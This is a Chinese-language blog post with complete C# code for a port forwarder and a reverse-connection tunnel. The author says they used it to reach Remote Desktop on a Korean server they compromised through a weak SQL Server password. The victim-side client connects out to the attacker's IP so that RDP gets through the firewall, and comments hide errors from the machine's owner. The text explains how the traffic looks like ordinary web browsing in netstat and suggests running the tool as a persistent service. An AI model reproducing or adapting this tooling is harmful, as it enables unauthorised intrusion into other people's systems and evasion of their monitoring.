c#做端口轉發程序支持正向連接和反向鏈接

3389的時候

例子1：連接a機器的3389端口連不上，因為對方防火墻或者網關做了限制，只能訪問a機器的個別端口比如80。

例子2：連接a機器的幾乎所有端口都連不上（對方乃內網或者防火墻網關做了限制），只能1433上去，但是對方可以連接你的某些端口。

解決

第一種較簡單，只需要程序在對方開80，你連接他80，程序收到數據后，發送到他本機的3389，同時從他3389收到數據后返回到你。程序就是一個中轉站。

[c-sharp]?view plaincopy  
 using?System;??
 using?System<a?href="http://lib.csdn.net/base/dotnet"?class='replace_word'?title=".NET知識庫"?target='_blank'?style='color:#df3434;?font-weight:bold;'>.NET</a>.Sockets;??
 using?System.Threading;??
 ??
 namespace?PortTransponder??
 {??
 ????class?Program??
 ????{??
 ????????static?void?Main(string[]?args)??
 ????????{??
 ????????????TcpListener?tl?=?new?TcpListener(80);//這里開對方可以被你連接并且未被占用的端口??
 ????????????tl.Start();??
 ????????????while?(true)//這里必須用循環，可以接收不止一個客戶，因為我發現終端服務有時一個端口不行就換一個端口重連??
 ????????????{??
 ????????????????//下面的意思就是一旦程序收到你發送的數據包后立刻開2個線程做中轉??
 ????????????????try??
 ????????????????{??
 ????????????????????TcpClient?tc1?=?tl.AcceptTcpClient();//這里是等待數據再執行下邊，不會100%占用cpu??
 ????????????????????TcpClient?tc2?=?new?TcpClient("localhost",?3389);??
 ????????????????????tc1.SendTimeout?=?300000;//設定超時，否則端口將一直被占用，即使失去連接??
 ????????????????????tc1.ReceiveTimeout?=?300000;??
 ????????????????????tc2.SendTimeout?=?300000;??
 ????????????????????tc2.ReceiveTimeout?=?300000;??
 ????????????????????object?obj1?=?(object)(new?TcpClient[]?{?tc1,?tc2?});??
 ????????????????????object?obj2?=?(object)(new?TcpClient[]?{?tc2,?tc1?});??
 ????????????????????ThreadPool.QueueUserWorkItem(new?WaitCallback(transfer),?obj1);??
 ????????????????????ThreadPool.QueueUserWorkItem(new?WaitCallback(transfer),?obj2);??
 ????????????????}??
 ????????????????catch?{?}??
 ????????????}??
 ????????}??
 ????????public?static?void?transfer(object?obj)??
 ????????{??
 ????????????TcpClient?tc1?=?((TcpClient[])obj)[0];??
 ????????????TcpClient?tc2?=?((TcpClient[])obj)[1];??
 ????????????NetworkStream?ns1?=?tc1.GetStream();??
 ????????????NetworkStream?ns2?=?tc2.GetStream();??
 ????????????while?(true)??
 ????????????{??
 ????????????????try??
 ????????????????{??
 ????????????????????//這里必須try?catch，否則連接一旦中斷程序就崩潰了，要是彈出錯誤提示讓機主看見那就囧了??
 ????????????????????byte[]?bt?=?new?byte[10240];??
 ????????????????????int?count?=?ns1.Read(bt,?0,?bt.Length);??
 ????????????????????ns2.Write(bt,?0,?count);??
 ????????????????}??
 ????????????????catch??
 ????????????????{??
 ????????????????????ns1.Dispose();??
 ????????????????????ns2.Dispose();??
 ????????????????????tc1.Close();??
 ????????????????????tc2.Close();??
 ????????????????????break;??
 ????????????????}??
 ????????????}??
 ????????}??
 ????}??
 }??

這樣在對方機器執行和，直接mstsc /v:對方ip:80就能終端上去了

第二種稍微復雜一點，需要客戶機和服務器2個程序，你在自己機器上開服務器端，在對方機器上執行客戶端連接你的服務器端，一旦連接上你的服務器端再開個端口讓終端程序連接，對方機器上客戶端再開個端口連接他自己的3389，做2次中轉就可以終端上去了。

具體流程

本機ip開8080端口

對方機器連接你的8080端口，比如端口是49908

連接成功后

你的機器再開一個比如9833端口

對方機器再開一個連接連接他自己的3389，比如端口是49909吧

好這時你用你的mstsc連接自己的 localhost:9833，數據包就從本機9833-本機8080-對方49908-對方49909-對方3389，對方3389的數據反著回來就行了。

[c-sharp]?view plaincopy  
 //服務器端??
 using?System;??
 using?System.Collections.Generic;??
 using?System<a?href="http://lib.csdn.net/base/dotnet"?class='replace_word'?title=".NET知識庫"?target='_blank'?style='color:#df3434;?font-weight:bold;'>.net</a>.Sockets;??
 using?System.Threading;??
 ??
 namespace?fanxiangserver??
 {??
 ????class?Program??
 ????{??
 ????????public?static?Dictionary<int,?TcpClient>?dic?=?new?Dictionary<int,?TcpClient>();??
 ????????public?static?NetworkStream?kongzhins?=?null;??
 ????????static?void?Main(string[]?args)??
 ????????{??
 ????????????ThreadPool.QueueUserWorkItem(new?WaitCallback(start1));??
 ????????????ThreadPool.QueueUserWorkItem(new?WaitCallback(start2));??
 ????????????WaitHandle.WaitAll(new?ManualResetEvent[]?{?new?ManualResetEvent(false)?});??
 ????????}??
 ????????public?static?void?start1(object?obj)??
 ????????{??
 ????????????TcpListener?tl?=?new?TcpListener(8080);//開一個對方可以連接的端口，今天這棒子機器連他只能1433，其他連不上，他連別人只能80?8080?21?????
 ????????????tl.Start();??
 ????????????while?(true)??
 ????????????{??
 ????????????????TcpClient?tc?=?tl.AcceptTcpClient();??
 ????????????????jieshou(tc);??
 ????????????}??
 ????????}??
 ????????public?static?void?start2(object?obj)??
 ????????{??
 ????????????TcpListener?tl?=?new?TcpListener(9833);?//開一個隨意端口讓自己的mstsc連。?????
 ????????????tl.Start();??
 ????????????while?(true)??
 ????????????{??
 ????????????????TcpClient?tc?=?tl.AcceptTcpClient();??
 ????????????????Random?rnd?=?new?Random();??
 ????????????????int?biaoji?=?rnd.Next(1000000000,?2000000000);??
 ????????????????dic.Add(biaoji,?tc);??
 ????????????????byte[]?bt?=?BitConverter.GetBytes(biaoji);??
 ????????????????kongzhins.Write(bt,?0,?bt.Length);??
 ????????????}??
 ????????}??
 ????????public?static?void?jieshou(TcpClient?tc)??
 ????????{??
 ????????????//這里體現的是一個配對的問題，自己體會一下吧??
 ????????????NetworkStream?ns?=?tc.GetStream();??
 ????????????byte[]?bt?=?new?byte[4];??
 ????????????int?count?=?ns.Read(bt,?0,?bt.Length);??
 ????????????if?(count?==?2?&&?bt[0]?==?0x6f?&&?bt[1]?==?0x6b)??
 ????????????{??
 ????????????????kongzhins?=?ns;??
 ????????????}??
 ????????????else??
 ????????????{??
 ????????????????int?biaoji?=?BitConverter.ToInt32(bt,?0);??
 ????????????????lianjie(biaoji,?tc);??
 ????????????}??
 ????????}??
 ????????public?static?void?lianjie(int?biaoji,?TcpClient?tc1)??
 ????????{??
 ????????????TcpClient?tc2?=?null;??
 ????????????if?(dic.ContainsKey(biaoji))??
 ????????????{??
 ????????????????dic.TryGetValue(biaoji,?out?tc2);??
 ????????????????dic.Remove(biaoji);??
 ????????????????tc1.SendTimeout?=?300000;??
 ????????????????tc1.ReceiveTimeout?=?300000;??
 ????????????????tc2.SendTimeout?=?300000;??
 ????????????????tc2.ReceiveTimeout?=?300000;??
 ????????????????object?obj1?=?(object)(new?TcpClient[]?{?tc1,?tc2?});??
 ????????????????object?obj2?=?(object)(new?TcpClient[]?{?tc2,?tc1?});??
 ????????????????ThreadPool.QueueUserWorkItem(new?WaitCallback(transfer),?obj1);??
 ????????????????ThreadPool.QueueUserWorkItem(new?WaitCallback(transfer),?obj2);??
 ????????????}??
 ????????}??
 ????????public?static?void?transfer(object?obj)??
 ????????{??
 ????????????TcpClient?tc1?=?((TcpClient[])obj)[0];??
 ????????????TcpClient?tc2?=?((TcpClient[])obj)[1];??
 ????????????NetworkStream?ns1?=?tc1.GetStream();??
 ????????????NetworkStream?ns2?=?tc2.GetStream();??
 ????????????while?(true)??
 ????????????{??
 ????????????????try??
 ????????????????{??
 ????????????????????//這里必須try?catch，否則連接一旦中斷程序就崩潰了，要是彈出錯誤提示讓機主看見那就囧了??
 ????????????????????byte[]?bt?=?new?byte[10240];??
 ????????????????????int?count?=?ns1.Read(bt,?0,?bt.Length);??
 ????????????????????ns2.Write(bt,?0,?count);??
 ????????????????}??
 ????????????????catch??
 ????????????????{??
 ????????????????????ns1.Dispose();??
 ????????????????????ns2.Dispose();??
 ????????????????????tc1.Close();??
 ????????????????????tc2.Close();??
 ????????????????????break;??
 ????????????????}??
 ????????????}??
 ????????}??
 ????}??
 }??

[c-sharp]?view plaincopy  
 //客戶端??
 using?System;??
 using?System.Text;??
 using?System<a?href="http://lib.csdn.net/base/dotnet"?class='replace_word'?title=".NET知識庫"?target='_blank'?style='color:#df3434;?font-weight:bold;'>.Net</a>.Sockets;??
 using?System.Threading;??
 ??
 namespace?fanxiangclient??
 {??
 ????class?Program??
 ????{??
 ????????public?static?NetworkStream?kongzhins?=?null;??
 ????????static?void?Main(string[]?args)??
 ????????{??
 ????????????try??
 ????????????{??
 ????????????????TcpClient?tc?=?new?TcpClient("你的IP",?8080);??
 ????????????????kongzhins?=?tc.GetStream();??
 ????????????????byte[]?bt?=?Encoding.Default.GetBytes("ok");//這里發送一個連接提示??
 ????????????????kongzhins.Write(bt,?0,?bt.Length);??
 ????????????????jieshou();??
 ????????????????WaitHandle.WaitAll(new?ManualResetEvent[]?{?new?ManualResetEvent(false)?});//這里為什么要這樣呢?我發現sqlserver執行是localsystem賬號如果console.read()程序馬上退出??
 ????????????}??
 ????????????catch?{?}??
 ????????}??
 ????????public?static?void?jieshou()??
 ????????{??
 ????????????while?(true)??
 ????????????{??
 ????????????????byte[]?bt?=?new?byte[4];??
 ????????????????kongzhins.Read(bt,?0,?bt.Length);??
 ????????????????TcpClient?tc1?=?new?TcpClient("你的IP",?8080);??
 ????????????????TcpClient?tc2?=?new?TcpClient("localhost",?3389);??
 ????????????????tc1.SendTimeout?=?300000;??
 ????????????????tc1.ReceiveTimeout?=?300000;??
 ????????????????tc2.SendTimeout?=?300000;??
 ????????????????tc2.ReceiveTimeout?=?300000;??
 ????????????????tc1.GetStream().Write(bt,?0,?bt.Length);??
 ????????????????object?obj1?=?(object)(new?TcpClient[]?{?tc1,?tc2?});??
 ????????????????object?obj2?=?(object)(new?TcpClient[]?{?tc2,?tc1?});??
 ????????????????ThreadPool.QueueUserWorkItem(new?WaitCallback(transfer),?obj1);??
 ????????????????ThreadPool.QueueUserWorkItem(new?WaitCallback(transfer),?obj2);??
 ????????????}??
 ????????}??
 ????????public?static?void?transfer(object?obj)??
 ????????{??
 ????????????TcpClient?tc1?=?((TcpClient[])obj)[0];??
 ????????????TcpClient?tc2?=?((TcpClient[])obj)[1];??
 ????????????NetworkStream?ns1?=?tc1.GetStream();??
 ????????????NetworkStream?ns2?=?tc2.GetStream();??
 ????????????while?(true)??
 ????????????{??
 ????????????????try??
 ????????????????{??
 ????????????????????byte[]?bt?=?new?byte[10240];??
 ????????????????????int?count?=?ns1.Read(bt,?0,?bt.Length);??
 ????????????????????ns2.Write(bt,?0,?count);??
 ????????????????}??
 ????????????????catch??
 ????????????????{??
 ????????????????????ns1.Dispose();??
 ????????????????????ns2.Dispose();??
 ????????????????????tc1.Close();??
 ????????????????????tc2.Close();??
 ????????????????????break;??
 ????????????????}??
 ????????????}??
 ????????}??
 ????}??
 }??

好，這樣你連接mstsc /v:localhost:9833，后數據就經過了好幾轉轉到了對方的3389上。這樣即使對方是內網也可以被終端了，而且好處是對方查看netstat -an看到的是這種東西

?? ??

? ????? ?? ???????????? ?? ??????????????? ??
? TCP??? 0.0.0.0:135??????????? 0.0.0.0:0????????????? LISTENING
? TCP??? 0.0.0.0:445??????????? 0.0.0.0:0????????????? LISTENING
? TCP??? 0.0.0.0:1433?????????? 0.0.0.0:0????????????? LISTENING
? TCP??? 0.0.0.0:3389?????????? 0.0.0.0:0????????????? LISTENING
? TCP??? 0.0.0.0:5357?????????? 0.0.0.0:0????????????? LISTENING
? TCP??? 0.0.0.0:49152????????? 0.0.0.0:0????????????? LISTENING
? TCP??? 0.0.0.0:49153????????? 0.0.0.0:0????????????? LISTENING
? TCP??? 0.0.0.0:49154????????? 0.0.0.0:0????????????? LISTENING
? TCP??? 0.0.0.0:49155????????? 0.0.0.0:0????????????? LISTENING
? TCP??? 0.0.0.0:49156????????? 0.0.0.0:0????????????? LISTENING
? TCP??? 0.0.0.0:49157????????? 0.0.0.0:0????????????? LISTENING
? TCP??? 他的IP:139???????????? 0.0.0.0:0????????????? LISTENING
? TCP??? 他的IP:49908?????????? 我的IP:8080??????????? ESTABLISHED
? TCP??? [::]:135?????????????? [::]:0???????????????? LISTENING
? TCP??? [::]:445?????????????? [::]:0???????????????? LISTENING
? TCP??? [::]:3389????????????? [::]:0???????????????? LISTENING
? TCP??? [::]:5357????????????? [::]:0???????????????? LISTENING
? TCP??? [::]:49152???????????? [::]:0???????????????? LISTENING
? TCP??? [::]:49153???????????? [::]:0???????????????? LISTENING
? TCP??? [::]:49154???????????? [::]:0???????????????? LISTENING
? TCP??? [::]:49155???????????? [::]:0???????????????? LISTENING
? TCP??? [::]:49156???????????? [::]:0???????????????? LISTENING
? TCP??? [::]:49157???????????? [::]:0???????????????? LISTENING
? TCP??? [::1]:3389???????????? [::1]:49909??????????? ESTABLISHED
? TCP??? [::1]:49909??????????? [::1]:3389???????????? ESTABLISHED
? UDP??? 0.0.0.0:123??????????? *:*
? UDP??? 0.0.0.0:500??????????? *:*
? UDP??? 0.0.0.0:1434?????????? *:*
? UDP??? 0.0.0.0:3702?????????? *:*
? UDP??? 0.0.0.0:3702?????????? *:*
? UDP??? 0.0.0.0:4500?????????? *:*
? UDP??? 0.0.0.0:5355?????????? *:*
? UDP??? 0.0.0.0:64966????????? *:*
? UDP??? 他的IP:137???????????? *:*
? UDP??? 他的IP:138???????????? *:*
? UDP??? [::]:123?????????????? *:*
? UDP??? [::]:500?????????????? *:*
? UDP??? [::]:3702????????????? *:*
? UDP??? [::]:3702????????????? *:*
? UDP??? [::]:5355????????????? *:*
? UDP??? [::]:64967???????????? *:*

只能看到他的49908在連接我的8080，就像看網站一樣，要是80就更像了，而49909連接3389一般注意不到，反正沒有ip地址，這棒子想不到吧，他做的這么變態的限制都被終端上去了，起因就是sqlserver弱口令和權限，這個機器是win2008，i7 920的u，不明白棒子的網管為什么一點安全知識都沒有，而且屢教不改，上次進去一看，那機器已經被國內黑克給x了n遍了，上邊布滿了木馬，最后實在啟動不了了，他重裝了，結果那個sqlserver還是那個權限還是那個密碼，服氣吧。但是如果netstat -ano發現連我的pid和連3389的pid是一個那就可以發現了。

以上程序都是經我測試后非常ok的，但是沒有經過優化，尤其是反向連接的，可以做成個服務是吧，或者連接的時候加個驗證啦什么的，還有我的Ip地址也是變的，可以做成個服務，定時讀取某一網頁上我的新ip，告訴他連還是不連啦，什么的。而且還可以做成個http代理翻wall啦，總之花樣是很多的。

2010年9月10日下午18點更正反向連接的一個小問題，即連接配對的問題，這樣的話只要肉雞反向連接到你的服務器端，你可以開多個終端上去用不同的賬號同時登陸了。

看到好多人說cpu占用率高什么的，我補充一句，我給出代碼的目的是告訴大家端口轉發的方法和思路，并不是讓你直接粘過去用，如果那樣的話我直接編譯成exe不就完了嗎，授人以魚不如授人以漁對吧，所以大家看明白了怎么回事自己去改和優化，像緩沖區大小是否合適啦，超時啦，連接判斷啦什么的，這些都是要自己去優化的，所以代碼很短嘛，就是為了讓大家看的簡單明了，所以直接用的話效率不會很高，但這是個完整骨架，我自己用的就在這段骨架的基礎上優化并增加了很多功能，而且cpu占用率內存占用都是沒有問題的。